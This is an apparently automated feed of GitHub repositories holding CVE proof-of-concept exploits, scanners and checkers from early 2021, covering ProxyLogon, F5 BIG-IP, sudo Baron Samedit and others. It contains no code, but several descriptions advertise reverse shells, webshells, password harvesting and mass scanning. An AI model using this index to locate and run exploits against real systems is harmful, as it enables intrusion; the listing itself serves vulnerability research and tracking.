**CVE-2017-9627 CVE-2017-9629 CVE-2017-9631** : [USSCltd/aaLogger](https://github.com/USSCltd/aaLogger) create time: 2021-04-08T09:16:47Z

**Jellyfin系统任意文件读取漏洞批量扫描验证脚本。** : [MzzdToT/CVE-2021-21402](https://github.com/MzzdToT/CVE-2021-21402) create time: 2021-04-08T07:41:40Z

**Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3** : [SxNade/CVE-2003-0264_EXPLOIT](https://github.com/SxNade/CVE-2003-0264_EXPLOIT) create time: 2021-04-08T04:51:24Z

**Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys.** : [0vercl0k/CVE-2021-24086](https://github.com/0vercl0k/CVE-2021-24086) create time: 2021-04-07T11:10:40Z

**no description** : [nice0e3/CVE-2020-14882_Exploit_Gui](https://github.com/nice0e3/CVE-2020-14882_Exploit_Gui) create time: 2021-04-07T09:48:49Z

**POC for CVE-2016-2098 in bash** : [Debalinax64/CVE-2016-2098](https://github.com/Debalinax64/CVE-2016-2098) create time: 2021-04-07T06:27:25Z

**no description** : [danshuizhangyu/CVE-2021-21300](https://github.com/danshuizhangyu/CVE-2021-21300) create time: 2021-04-07T06:48:16Z

**Cnvd-2020-10487 / cve-2020-1938, scanner tool** : [bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner](https://github.com/bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner) create time: 2020-02-20T21:00:15Z

**vRealize RCE + Privesc (CVE-2021-21975, CVE-2021-21983, CVE-0DAY-?????)** : [rabidwh0re/REALITY_SMASHER](https://github.com/rabidwh0re/REALITY_SMASHER) create time: 2021-04-06T23:24:38Z

**XSS Discovered By: Orion Hridoy** : [orionhridoy/CVE-2021-30150](https://github.com/orionhridoy/CVE-2021-30150) create time: 2021-04-06T16:13:04Z

**RCE 0day (Orion Hridoy)** : [orionhridoy/CVE-2021-30149](https://github.com/orionhridoy/CVE-2021-30149) create time: 2021-04-06T16:12:03Z

**[CVE-2021-21972] VMware vSphere Client Unauthorized File Upload to Remote Code Execution (RCE)** : [murataydemir/CVE-2021-21972](https://github.com/murataydemir/CVE-2021-21972) create time: 2021-04-06T10:38:40Z

**Seafile 7.0.5 Persistent XSS** : [Security-AVS/CVE-2021-30146](https://github.com/Security-AVS/CVE-2021-30146) create time: 2021-04-06T09:16:37Z

**C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection** : [Flangvik/SharpProxyLogon](https://github.com/Flangvik/SharpProxyLogon) create time: 2021-03-29T21:10:34Z

**no description** : [pwn3z/CVE-2019-19781-Citrix](https://github.com/pwn3z/CVE-2019-19781-Citrix) create time: 2021-04-06T05:24:59Z

**Exploit Code for CVE-2020-1472 aka Zerologon** : [Udyz/Zerologon](https://github.com/Udyz/Zerologon) create time: 2021-04-06T02:48:35Z

**no description** : [Sec504/Zyxel-NBG2105-CVE-2021-3297](https://github.com/Sec504/Zyxel-NBG2105-CVE-2021-3297) create time: 2021-04-06T02:38:43Z

**no description** : [fengzhouc/CVE-2021-21300](https://github.com/fengzhouc/CVE-2021-21300) create time: 2021-04-06T01:44:17Z

**Exploit for CVE-2012-2982** : [Ari-Weinberg/CVE-2012-2982](https://github.com/Ari-Weinberg/CVE-2012-2982) create time: 2021-04-06T01:31:58Z

**no description** : [AlexSeniorProject/CVE-2021-3156](https://github.com/AlexSeniorProject/CVE-2021-3156) create time: 2021-04-05T18:00:43Z

**Exploiting CVE-2014-7205 by injecting arbitrary JavaScript resulting in Remote Code Execution.** : [maximilianmarx/bassmaster-rce](https://github.com/maximilianmarx/bassmaster-rce) create time: 2021-04-05T17:02:36Z

**This Tool Aims to Exploit the CVE-2018-13341** : [Rajchowdhury420/CVE-2018-13341](https://github.com/Rajchowdhury420/CVE-2018-13341) create time: 2021-04-05T13:37:28Z

**Froala Persistent XSS** : [Hackdwerg/CVE-2021-30109](https://github.com/Hackdwerg/CVE-2021-30109) create time: 2021-04-05T10:14:48Z

**no description** : [delina1/CVE-2018-8174_EXP](https://github.com/delina1/CVE-2018-8174_EXP) create time: 2021-04-05T02:31:54Z

**no description** : [delina1/CVE-2018-8174](https://github.com/delina1/CVE-2018-8174) create time: 2021-04-05T02:27:49Z

**浪潮ClusterEngineV4.0 远程命令执行漏洞扫描脚本。** : [MzzdToT/CVE-2020-21224](https://github.com/MzzdToT/CVE-2020-21224) create time: 2021-04-04T07:38:58Z

**Viber Messenger remote account reset exploit** : [thesamarkand2/CVE-2019-18800](https://github.com/thesamarkand2/CVE-2019-18800) create time: 2021-04-04T06:19:22Z

**CVE-2017-9805-Exploit** : [0xd3vil/CVE-2017-9805-Exploit](https://github.com/0xd3vil/CVE-2017-9805-Exploit) create time: 2021-04-04T04:35:19Z

**no description** : [password520/cve-2020-1337-poc](https://github.com/password520/cve-2020-1337-poc) create time: 2021-04-04T02:56:02Z

**no description** : [password520/CVE-2021-3156](https://github.com/password520/CVE-2021-3156) create time: 2021-04-04T01:15:05Z

**no description** : [CyberCommands/CVE2021-21975](https://github.com/CyberCommands/CVE2021-21975) create time: 2021-04-03T16:13:53Z

**no description** : [piruprohacking/CVE-2020-25213](https://github.com/piruprohacking/CVE-2020-25213) create time: 2021-04-03T13:52:21Z

**PoC (Proof of Concept) - CVE-2020-17453** : [JHHAX/CVE-2020-17453-PoC](https://github.com/JHHAX/CVE-2020-17453-PoC) create time: 2021-04-03T13:49:39Z

**no description** : [password520/CVE-2021-21972](https://github.com/password520/CVE-2021-21972) create time: 2021-04-03T12:09:53Z

**[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)** : [murataydemir/CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975) create time: 2021-04-02T21:14:06Z

**no description** : [Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922](https://github.com/Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922) create time: 2021-04-02T15:51:03Z

**Nintendo CVE 2018-6242** : [Kinesys/Kinesys-Nintendo-CVE-2018-6242](https://github.com/Kinesys/Kinesys-Nintendo-CVE-2018-6242) create time: 2021-04-02T05:00:05Z

**no description** : [shreesh1/CVE-2014-0226-poc](https://github.com/shreesh1/CVE-2014-0226-poc) create time: 2021-04-02T04:53:26Z

**no description** : [ltfafei/CVE-2021-21975_VMware_SSRF](https://github.com/ltfafei/CVE-2021-21975_VMware_SSRF) create time: 2021-04-02T02:14:12Z

**Nmap script to check vulnerability CVE-2021-21975** : [GuayoyoCyber/CVE-2021-21975](https://github.com/GuayoyoCyber/CVE-2021-21975) create time: 2021-04-01T21:59:05Z

**CVE-2021-26295 Apache OFBiz POC** : [ltfafei/CVE-2021-26295_Apache_OFBiz_POC](https://github.com/ltfafei/CVE-2021-26295_Apache_OFBiz_POC) create time: 2021-04-01T11:58:00Z

**no description** : [Vulnmachines/apache-ofbiz-CVE-2020-9496](https://github.com/Vulnmachines/apache-ofbiz-CVE-2020-9496) create time: 2021-04-01T09:58:23Z

**POC for CVE-2021-24098** : [waleedassar/CVE-2021-24098](https://github.com/waleedassar/CVE-2021-24098) create time: 2021-04-01T07:29:44Z

**An issue was discovered in includes/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS running this software, and execute commands on the system including ones for uploading of files and execution of code.** : [gerberop/CVE-2020-24572-POC](https://github.com/gerberop/CVE-2020-24572-POC) create time: 2021-04-01T01:33:26Z

**no description** : [0xBaz/CVE-2021-29349](https://github.com/0xBaz/CVE-2021-29349) create time: 2021-03-31T19:36:29Z

**Study on CVE-2020-13401 vulnerability of containers in dockers older than 19.03.11** : [mmzaeimi/Docker-Container-CVE-2020-13401](https://github.com/mmzaeimi/Docker-Container-CVE-2020-13401) create time: 2021-03-31T17:45:10Z

**CVE-2021-21975 vRealize Operations Manager SSRF** : [Al1ex/CVE-2021-21975](https://github.com/Al1ex/CVE-2021-21975) create time: 2021-03-31T15:40:09Z

**CVE-2017-7529** : [Moazj8/Nginx-Remote-Integer-Overflow-Vulnerability](https://github.com/Moazj8/Nginx-Remote-Integer-Overflow-Vulnerability) create time: 2021-03-31T15:24:07Z

**VMWare vRealize SSRF-CVE-2021-21975** : [Henry4E36/VMWare-vRealize-SSRF](https://github.com/Henry4E36/VMWare-vRealize-SSRF) create time: 2021-03-31T12:56:09Z

**POC for CVE-2021-1699** : [waleedassar/CVE-2021-1699](https://github.com/waleedassar/CVE-2021-1699) create time: 2021-03-31T08:22:49Z

**no description** : [hevox/CVE-2021-26828_ScadaBR_RCE](https://github.com/hevox/CVE-2021-26828_ScadaBR_RCE) create time: 2021-03-31T02:39:02Z

**CVE-2019-12840** : [zAbuQasem/CVE-2019-12840](https://github.com/zAbuQasem/CVE-2019-12840) create time: 2021-03-30T17:32:30Z

**test** : [f0ns1/CVE-2020](https://github.com/f0ns1/CVE-2020) create time: 2021-03-30T15:24:13Z

**no description** : [ltfafei/CVE-2021-1732_exp](https://github.com/ltfafei/CVE-2021-1732_exp) create time: 2021-03-30T07:51:21Z

**CVE-2020-27955 Poc** : [NeoDarwin/CVE-2020-27955](https://github.com/NeoDarwin/CVE-2020-27955) create time: 2021-03-30T07:12:11Z

**D-Link DCS系列账号密码信息泄露漏洞,通过脚本获取账号密码,可批量。** : [MzzdToT/CVE-2020-25078](https://github.com/MzzdToT/CVE-2020-25078) create time: 2021-03-30T06:57:31Z

**CVE-2021-3156漏洞修复Shell** : [Nokialinux/CVE-2021-3156](https://github.com/Nokialinux/CVE-2021-3156) create time: 2021-03-30T06:17:44Z

**no description** : [waleedassar/CVE-2021-1656](https://github.com/waleedassar/CVE-2021-1656) create time: 2021-03-30T05:21:26Z

**Public PoC Disclosure for CVE-2020-23839 - GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal** : [boku7/CVE-2020-23839](https://github.com/boku7/CVE-2020-23839) create time: 2021-03-30T00:39:25Z

**no description** : [dotslashed/CVE-2021-22986](https://github.com/dotslashed/CVE-2021-22986) create time: 2021-03-29T13:01:08Z

**SherlockIM ChatBot XSS** : [Security-AVS/CVE-2021-29267](https://github.com/Security-AVS/CVE-2021-29267) create time: 2021-03-29T12:50:23Z

**no description** : [Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541](https://github.com/Ethan-Chen-uwo/A-breif-introduction-of-CVE-2017-16541) create time: 2021-03-29T09:52:11Z

**Code By:Tas9er / F5 BIG-IP 远程命令执行漏洞** : [Tas9er/CVE-2021-22986](https://github.com/Tas9er/CVE-2021-22986) create time: 2021-03-29T05:56:21Z

**Another implementation for linux privilege escalation exploit via snap(d) (CVE-2019-7304)** : [bendalisoftpro/snap_priv_esc](https://github.com/bendalisoftpro/snap_priv_esc) create time: 2021-03-28T23:17:27Z

**no description** : [Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat](https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat) create time: 2021-03-28T03:30:44Z

**no description** : [code-developers/CVE-2020-11932](https://github.com/code-developers/CVE-2020-11932) create time: 2021-03-27T07:14:58Z

**CVE-2021-22192 靶场: 未授权用户 RCE 漏洞** : [lyy289065406/CVE-2021-22192](https://github.com/lyy289065406/CVE-2021-22192) create time: 2021-03-27T07:09:46Z

**no description** : [CyberCommands/CVE2021-23132](https://github.com/CyberCommands/CVE2021-23132) create time: 2021-03-26T20:36:00Z

**no description** : [siramk/CVE-2018-1335](https://github.com/siramk/CVE-2018-1335) create time: 2021-03-26T11:51:23Z

**F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用** : [yaunsky/CVE-202122986-EXP](https://github.com/yaunsky/CVE-202122986-EXP) create time: 2021-03-26T03:32:06Z

**CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻** : [terorie/cve-2021-3449](https://github.com/terorie/cve-2021-3449) create time: 2021-03-26T01:09:25Z

**Vulnerability analysis and PoC for the Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (RCE)** : [jaiguptanick/CVE-2019-0232](https://github.com/jaiguptanick/CVE-2019-0232) create time: 2021-03-25T20:09:54Z

**Proof of concept for CVE-2020-11819 and CVE-2020-15946** : [danyx07/PoC-RCE-Rukovoditel](https://github.com/danyx07/PoC-RCE-Rukovoditel) create time: 2021-03-25T16:03:24Z

**BuddyPress < 7.2.1 - REST API Privilege Escalation to RCE** : [HoangKien1020/CVE-2021-21389](https://github.com/HoangKien1020/CVE-2021-21389) create time: 2021-03-25T08:54:37Z

**Verify Vulnerability CVE-2021-26855** : [inpalmer/MSE-Exchange-Alert-Check](https://github.com/inpalmer/MSE-Exchange-Alert-Check) create time: 2021-03-25T08:52:49Z

**this is a local scanner for cve-2019-0708** : [ORCA666/CVE-2019--0708-SCANNER](https://github.com/ORCA666/CVE-2019--0708-SCANNER) create time: 2021-03-25T07:05:38Z

**Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc** : [xiaopan233/Mybb-XSS_SQL_RCE-POC](https://github.com/xiaopan233/Mybb-XSS_SQL_RCE-POC) create time: 2021-03-25T06:00:31Z

**POC for CVE-2021-26871(Maybe)** : [robotMD5/CVE-2021-26871_POC](https://github.com/robotMD5/CVE-2021-26871_POC) create time: 2021-03-25T02:38:08Z

**no description** : [0xAJ2K/CVE-2018-15961](https://github.com/0xAJ2K/CVE-2018-15961) create time: 2021-03-24T21:27:25Z

**CVE-2021-26295 EXP 可成功反弹Shell** : [r0ckysec/CVE-2021-26295](https://github.com/r0ckysec/CVE-2021-26295) create time: 2021-03-24T10:08:54Z

**CVE-2017-0100、MS17-012、Eop** : [cssxn/CVE-2017-0100](https://github.com/cssxn/CVE-2017-0100) create time: 2021-03-24T09:21:09Z

**CVE-2021-26295 Apache OFBiz rmi反序列化POC** : [rakjong/CVE-2021-26295-Apache-OFBiz](https://github.com/rakjong/CVE-2021-26295-Apache-OFBiz) create time: 2021-03-24T08:25:04Z

**Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.** : [praetorian-inc/proxylogon-exploit](https://github.com/praetorian-inc/proxylogon-exploit) create time: 2021-03-24T01:12:48Z

**solution** : [theJuan1112/pentesterlab-cve-2018-6574](https://github.com/theJuan1112/pentesterlab-cve-2018-6574) create time: 2021-03-23T21:10:23Z

**no description** : [yumusb/CVE-2021-26295](https://github.com/yumusb/CVE-2021-26295) create time: 2021-03-23T15:25:01Z

**analytics ProxyLogo Mail exchange RCE** : [hictf/CVE-2021-26855-CVE-2021-27065](https://github.com/hictf/CVE-2021-26855-CVE-2021-27065) create time: 2021-03-23T07:37:47Z

**CVE-2019-0708扫描** : [SurrealSky/CVE20190708SCAN](https://github.com/SurrealSky/CVE20190708SCAN) create time: 2021-03-23T03:28:30Z

**CVE-2021-22986 Checker Script in Python3** : [ZephrFish/CVE-2021-22986_Check](https://github.com/ZephrFish/CVE-2021-22986_Check) create time: 2021-03-23T02:04:39Z

**🐱‍💻 👍 Google Chrome - File System Access API - vulnerabilities reported by Maciej Pulikowski | Total Bug Bounty Reward: $5.000 | CVE-2021-21123 and 5 more...** : [Puliczek/CVE-2021-21123-PoC-Google-Chrome](https://github.com/Puliczek/CVE-2021-21123-PoC-Google-Chrome) create time: 2021-03-22T11:53:57Z

**no description** : [EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution](https://github.com/EEsshq/CVE-2017-0144---EtneralBlue-MS17-010-Remote-Code-Execution) create time: 2021-03-22T09:33:51Z

**no description** : [ari5ti/Janus-Vulnerability-CVE-2017-13156-Exploit-with-POC](https://github.com/ari5ti/Janus-Vulnerability-CVE-2017-13156-Exploit-with-POC) create time: 2021-03-22T08:27:10Z

**CVE-2021-22986 & F5 BIG-IP RCE** : [Al1ex/CVE-2021-22986](https://github.com/Al1ex/CVE-2021-22986) create time: 2021-03-22T07:13:50Z

**lanproxy(CVE-2021-3019)目录遍历** : [Aoyuh/cve-2021-3019](https://github.com/Aoyuh/cve-2021-3019) create time: 2021-03-22T06:44:07Z

**Bypass bludit mitigation login form and upload malicious to call a rev shell** : [jayngng/bludit-CVE-2019-17240](https://github.com/jayngng/bludit-CVE-2019-17240) create time: 2021-03-22T01:50:43Z

**CVE-2021-22986 F5 BIG-IP iControl 命令执行漏洞** : [safesword/F5_RCE](https://github.com/safesword/F5_RCE) create time: 2021-03-21T07:40:51Z

**F5 BIG-IP/BIG-IQ iControl Rest API SSRF to RCE** : [Udyz/CVE-2021-22986-SSRF2RCE](https://github.com/Udyz/CVE-2021-22986-SSRF2RCE) create time: 2021-03-21T04:58:17Z

**no description** : [feihong-cs/Attacking_Shiro_with_CVE_2020_2555](https://github.com/feihong-cs/Attacking_Shiro_with_CVE_2020_2555) create time: 2021-03-20T15:28:09Z

**Exploiting CVE-2016-2555 enumerating and dumping the underlying Database.** : [maximilianmarx/atutor-blind-sqli](https://github.com/maximilianmarx/atutor-blind-sqli) create time: 2021-03-20T11:42:32Z

**A vulnerability scanner that detects CVE-2021-22986 vulnerabilities.** : [Osyanina/westone-CVE-2021-22986-scanner](https://github.com/Osyanina/westone-CVE-2021-22986-scanner) create time: 2021-03-20T07:45:38Z

**cve-2021-22986 f5 rce 漏洞批量检测 poc** : [S1xHcL/f5_rce_poc](https://github.com/S1xHcL/f5_rce_poc) create time: 2021-03-19T18:50:22Z

**Exploit generator for sudo CVE-2021-3156** : [lmol/CVE-2021-3156](https://github.com/lmol/CVE-2021-3156) create time: 2021-03-19T14:06:09Z

**Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)** : [Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal](https://github.com/Nickguitar/Jquery-File-Tree-1.6.6-Path-Traversal) create time: 2021-03-19T12:39:10Z

**CVE-2020-27223 Vulnerability App & PoC** : [motikan2010/CVE-2020-27223](https://github.com/motikan2010/CVE-2020-27223) create time: 2021-03-19T03:50:45Z

**PoC Python script as an exercice from tryhackme.** : [AlexJS6/CVE-2012-2982_Python](https://github.com/AlexJS6/CVE-2012-2982_Python) create time: 2021-03-18T16:47:43Z

**Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability** : [cssxn/CVE-2020-17136](https://github.com/cssxn/CVE-2020-17136) create time: 2021-03-18T16:13:23Z

**CVE-2020-17136 exploit** : [xyddnljydd/CVE-2020-17136](https://github.com/xyddnljydd/CVE-2020-17136) create time: 2021-03-18T11:16:36Z

**no description** : [shacojx/CVE-2021-26855-exploit-Exchange](https://github.com/shacojx/CVE-2021-26855-exploit-Exchange) create time: 2021-03-18T10:45:54Z

**CutePHP Cute News 2.1.2 RCE PoC** : [thewhiteh4t/cve-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447) create time: 2021-03-18T09:24:29Z

**Microsoft Exchange Proxylogon Exploit Chain EXP分析** : [r0ckysec/CVE-2021-26855_Exchange](https://github.com/r0ckysec/CVE-2021-26855_Exchange) create time: 2021-03-18T00:44:29Z

**There was a flaw in the WordPress plugin, Email Subscribers & Newsletters before 4.3.1, that allowed SQL statements to be passed to the database in the hash parameter (a blind SQL injection vulnerability).** : [jerrylewis9/CVE-2019-20361-EXPLOIT](https://github.com/jerrylewis9/CVE-2019-20361-EXPLOIT) create time: 2021-03-18T00:22:05Z

**Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)** : [ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE](https://github.com/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE) create time: 2021-03-17T12:07:12Z

**An Exploit Utlising CVE-2021-3156 To Harvest All passwords in any Linux system with Sudo < version 1.9.5p2.** : [Chal13W1zz/Sudo-Spunk](https://github.com/Chal13W1zz/Sudo-Spunk) create time: 2021-03-17T08:02:07Z

**This is a Poc for BIGIP iControl unauth RCE** : [dorkerdevil/CVE-2021-22986-Poc](https://github.com/dorkerdevil/CVE-2021-22986-Poc) create time: 2021-03-17T05:02:45Z

**ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)** : [p0wershe11/ProxyLogon](https://github.com/p0wershe11/ProxyLogon) create time: 2021-03-17T03:56:54Z

**CVE-2021-26855 proxyLogon metasploit exploit script** : [TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit](https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit) create time: 2021-03-17T03:32:19Z

**no description** : [DXY0411/CVE-2019-1020010](https://github.com/DXY0411/CVE-2019-1020010) create time: 2021-03-16T17:13:32Z

**no description** : [shacojx/Scan-Vuln-CVE-2021-26855](https://github.com/shacojx/Scan-Vuln-CVE-2021-26855) create time: 2021-03-16T15:59:17Z

**Chaining CVE-2021-26855 and CVE-2021-26857 to exploit Microsoft Exchange** : [Immersive-Labs-Sec/ProxyLogon](https://github.com/Immersive-Labs-Sec/ProxyLogon) create time: 2021-03-16T10:14:56Z

**ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.** : [RickGeex/ProxyLogon](https://github.com/RickGeex/ProxyLogon) create time: 2021-03-16T07:31:25Z

**automate me!** : [freakanonymous/CVE-2021-21973-Automateme](https://github.com/freakanonymous/CVE-2021-21973-Automateme) create time: 2021-03-16T00:50:15Z

**Sudo Baron Samedit Exploit** : [worawit/CVE-2021-3156](https://github.com/worawit/CVE-2021-3156) create time: 2021-03-15T17:37:02Z

**no description** : [Mr-xn/CVE-2021-26855-d](https://github.com/Mr-xn/CVE-2021-26855-d) create time: 2021-03-15T14:03:16Z

**ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)** : [herwonowr/exprolog](https://github.com/herwonowr/exprolog) create time: 2021-03-15T08:36:56Z

**CVE-2021-229861** : [adminwaf/CVE-2021-229861](https://github.com/adminwaf/CVE-2021-229861) create time: 2021-03-15T06:48:04Z

**CVE-2021-22986** : [adminwaf/CVE-2021-22986](https://github.com/adminwaf/CVE-2021-22986) create time: 2021-03-15T06:45:24Z

**no description** : [ETOCheney/cve-2021-21300](https://github.com/ETOCheney/cve-2021-21300) create time: 2021-03-15T05:28:47Z

**RCE exploit for ProxyLogon vulnerability in Microsoft Exchange** : [mil1200/ProxyLogon-CVE-2021-26855](https://github.com/mil1200/ProxyLogon-CVE-2021-26855) create time: 2021-03-14T22:57:21Z

**Exploit Samba** : [ozuma/CVE-2007-2447](https://github.com/ozuma/CVE-2007-2447) create time: 2021-03-14T17:48:23Z

**CVE-2021-26855: PoC (Not a HoneyPoC for once!)** : [ZephrFish/Exch-CVE-2021-26855](https://github.com/ZephrFish/Exch-CVE-2021-26855) create time: 2021-03-14T14:23:34Z

**Will write a python script for exploiting this vulnerability** : [k0rup710n/Wordpress-CVE-2020-25213](https://github.com/k0rup710n/Wordpress-CVE-2020-25213) create time: 2021-03-12T22:58:43Z

**no description** : [vonderchild/CVE-2016-3088](https://github.com/vonderchild/CVE-2016-3088) create time: 2021-03-12T17:12:09Z

**Scanner and PoC for CVE-2021-26855** : [KotSec/CVE-2021-26855-Scanner](https://github.com/KotSec/CVE-2021-26855-Scanner) create time: 2021-03-12T12:47:41Z

**no description** : [CppXL/CVE-2021-21300](https://github.com/CppXL/CVE-2021-21300) create time: 2021-03-12T06:45:04Z

**no description** : [0xmahmoudJo0/Check_Emails_For_CVE_2021_26855](https://github.com/0xmahmoudJo0/Check_Emails_For_CVE_2021_26855) create time: 2021-03-12T03:48:09Z

**Alibaba-Nacos-Unauthorized/ApacheDruid-RCE_CVE-2021-25646/MS-Exchange-SSRF-CVE-2021-26885/Oracle-WebLogic-CVE-2021-2109_RCE/RG-CNVD-2021-14536/RJ-SSL-VPN-UltraVires/Redis-Unauthorized-RCE/TDOA-V11.7-GetOnlineCookie/VMware-vCenter-GetAnyFile/yongyou-GRP-U8-XXE/Oracle-WebLogic-CVE-2020-14883/Oracle-WebLogic-CVE-2020-14882/Apache-Solr-GetAnyFile/F5-BIG-IP-CVE-2021-22986/Sonicwall-SSL-VPN-RCE/GitLab-Graphql-CNVD-2021-14193/D-Link-DCS-CVE-2020-25078/WLAN-AP-WEA453e-RCE** : [Yang0615777/PocList](https://github.com/Yang0615777/PocList) create time: 2021-03-11T22:49:17Z

**CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065** : [SCS-Labs/HAFNIUM-Microsoft-Exchange-0day](https://github.com/SCS-Labs/HAFNIUM-Microsoft-Exchange-0day) create time: 2021-03-11T21:18:29Z

**PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github** : [hackerschoice/CVE-2021-26855](https://github.com/hackerschoice/CVE-2021-26855) create time: 2021-03-11T20:51:48Z

**CVE-2021-26855, also known as Proxylogon, is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at https://proxylogon.com.** : [raheel0x01/eeb927d1189ad44742095f58636483984bfbfa355f69f94439e276df306d9568](https://github.com/raheel0x01/eeb927d1189ad44742095f58636483984bfbfa355f69f94439e276df306d9568) create time: 2021-03-11T19:35:35Z

**proxylogon exploit - CVE-2021-26857** : [sirpedrotavares/Proxylogon-exploit](https://github.com/sirpedrotavares/Proxylogon-exploit) create time: 2021-03-11T17:32:32Z

**PoC** : [songjianyang/CVE-2021-26882](https://github.com/songjianyang/CVE-2021-26882) create time: 2021-03-11T13:41:42Z

**no description** : [Kirill89/CVE-2021-21300](https://github.com/Kirill89/CVE-2021-21300) create time: 2021-03-11T09:56:03Z

**[CVE-2021-3019] LanProxy Directory Traversal** : [murataydemir/CVE-2021-3019](https://github.com/murataydemir/CVE-2021-3019) create time: 2021-03-11T07:40:44Z

**Apache ActiveMQ Remote Code Execution Exploit** : [cyberaguiar/CVE-2016-3088](https://github.com/cyberaguiar/CVE-2016-3088) create time: 2021-03-11T05:54:34Z

**no description** : [shacojx/CVE_2021_26855_SSRF](https://github.com/shacojx/CVE_2021_26855_SSRF) create time: 2021-03-11T04:33:40Z

**remote code exec for git** : [1uanWu/CVE-2021-21300](https://github.com/1uanWu/CVE-2021-21300) create time: 2021-03-11T03:59:49Z

**no description** : [Maskhe/CVE-2021-21300](https://github.com/Maskhe/CVE-2021-21300) create time: 2021-03-11T02:57:11Z

**no description** : [erranfenech/CVE-2021-21300](https://github.com/erranfenech/CVE-2021-21300) create time: 2021-03-10T17:15:49Z

**Multiple untrusted search path vulnerabilities in MicroStation 7.1 allow local users to gain privileges via a Trojan horse (1) mptools.dll, (2) baseman.dll, (3) wintab32.dll, or (4) wintab.dll file in the current working directory, as demonstrated by a directory that contains a .hln or .rdl file. NOTE: some of these details are obtained from third party information.** : [otofoto/CVE-2010-5230](https://github.com/otofoto/CVE-2010-5230) create time: 2021-03-10T16:48:53Z

**no description** : [Faisal78123/CVE-2021-21300](https://github.com/Faisal78123/CVE-2021-21300) create time: 2021-03-10T16:45:46Z

**no description** : [achabahe/CVE-2021-26855](https://github.com/achabahe/CVE-2021-26855) create time: 2021-03-10T12:23:43Z

**no description** : [AlkenePan/CVE-2021-21300](https://github.com/AlkenePan/CVE-2021-21300) create time: 2021-03-10T08:29:49Z

**no description** : [alt3kx/CVE-2021-26855_PoC](https://github.com/alt3kx/CVE-2021-26855_PoC) create time: 2021-03-10T05:21:19Z

**Injeccion sql** : [Sharker3312/CVE-2019-12384](https://github.com/Sharker3312/CVE-2019-12384) create time: 2021-03-10T01:37:15Z

**no description** : [dock0d1/CVE-2021-3156](https://github.com/dock0d1/CVE-2021-3156) create time: 2021-03-09T18:53:14Z

**no description** : [h4x0r-dz/CVE-2021-26855](https://github.com/h4x0r-dz/CVE-2021-26855) create time: 2021-03-09T16:54:39Z

**PoC exploit code for CVE-2021-26855** : [srvaccount/CVE-2021-26855-PoC](https://github.com/srvaccount/CVE-2021-26855-PoC) create time: 2021-03-09T14:27:06Z

**no description** : [dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit](https://github.com/dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit) create time: 2021-03-09T12:56:08Z

**Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)** : [PwCNO-CTO/CVE-2021-26855](https://github.com/PwCNO-CTO/CVE-2021-26855) create time: 2021-03-09T11:57:26Z

**CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065** : [DCScoder/Exchange_IOC_Hunter](https://github.com/DCScoder/Exchange_IOC_Hunter) create time: 2021-03-09T10:36:44Z

**This script test the CVE-2021-26855 vulnerability on Exchange Server.** : [mauricelambert/ExchangeWeaknessTest](https://github.com/mauricelambert/ExchangeWeaknessTest) create time: 2021-03-09T09:40:29Z

**no description** : [oneoy/CVE-2021-1732-Exploit](https://github.com/oneoy/CVE-2021-1732-Exploit) create time: 2021-03-09T02:13:43Z

**A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).** : [dwisiswant0/proxylogscan](https://github.com/dwisiswant0/proxylogscan) create time: 2021-03-08T11:54:32Z

**CVE-2021-26855 exp** : [charlottelatest/CVE-2021-26855](https://github.com/charlottelatest/CVE-2021-26855) create time: 2021-03-08T08:39:05Z

